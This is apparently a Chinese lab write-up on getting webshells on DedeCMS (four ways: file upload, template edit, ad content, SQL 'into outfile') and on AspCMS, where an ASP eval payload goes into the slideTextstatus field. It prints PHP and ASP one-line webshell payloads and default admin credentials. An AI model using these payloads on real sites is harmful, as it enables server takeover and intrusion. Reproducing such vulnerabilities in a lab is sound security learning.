dedecms(四种webshell姿势)aspcms webshell漏洞复现

dedecms

我们首先访问靶场

姿势1上传文件getshell

首先登录后台

点击文件管理器》文件上传

写一个php一句话木马文件

然后进行上传

点击上传之后提示上传成功并且目录里也显示了我们刚刚上传的文件,并且最上面有显示文件的路径

然后我们进行访问并连接

连接成功

姿势2 修改模版文件getshell

点击模版找到index.html 并点击修改

在代码的开头写入php一句话木马,点击保存

然后返回点击生成,修改网页为静态网页

然后进行访问

并连接

姿势3后台任意命令执行getshell

模块》广告管理》增加一个新广告

在广告内容里写入一句话木马

然后点击代码在,里面找到文件的路径

访问并连接

姿势4 sql命令执行写入php木马getshell

点击系统》sql命令执行工具》写入payload

复制代码
select '<?php @eval($_POST[cmd]);?>' into outfile "D:/phpstudy_pro/www/dedecms/2.php"

然后直接访问我们写入的2.php文件并进行连接

aspcms

访问网站出现报错

说明浏览器不会给我们自动访问index网页,那么我们在url后面加上index.asp再进行访问

访问后台管理页面,并使用账号密码登录

admin 123456

然后点击扩展》幻灯片设置》点击保存时进行抓包

在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp

文件内容

1%25><%25Eval(Request(chr(65)))%25><%25 密码为a

然后进行访问并进行连接

使用菜刀进行连接,并成功getshell

相关推荐
远方160940 分钟前
14-Oracle 23ai Vector Search 向量索引和混合索引-实操
数据库·ai·oracle
GUIQU.2 小时前
【Oracle】数据仓库
数据库·oracle
恰薯条的屑海鸥2 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十六期-SSRF模块)
数据库·学习·安全·web安全·渗透测试·网络安全学习
咖啡啡不加糖2 小时前
Redis大key产生、排查与优化实践
java·数据库·redis·后端·缓存
曼汐 .2 小时前
数据库管理与高可用-MySQL高可用
数据库·mysql
2301_793102493 小时前
Linux——MySql数据库
linux·数据库
喵叔哟3 小时前
第4章:Cypher查询语言基础
数据库
刘 大 望3 小时前
数据库-联合查询(内连接外连接),子查询,合并查询
java·数据库·sql·mysql
从零开始学习人工智能3 小时前
Doris 数据库深度解析:架构、原理与实战应用
数据库·架构
LiRuiJie4 小时前
深入剖析MySQL锁机制,多事务并发场景锁竞争
数据库·mysql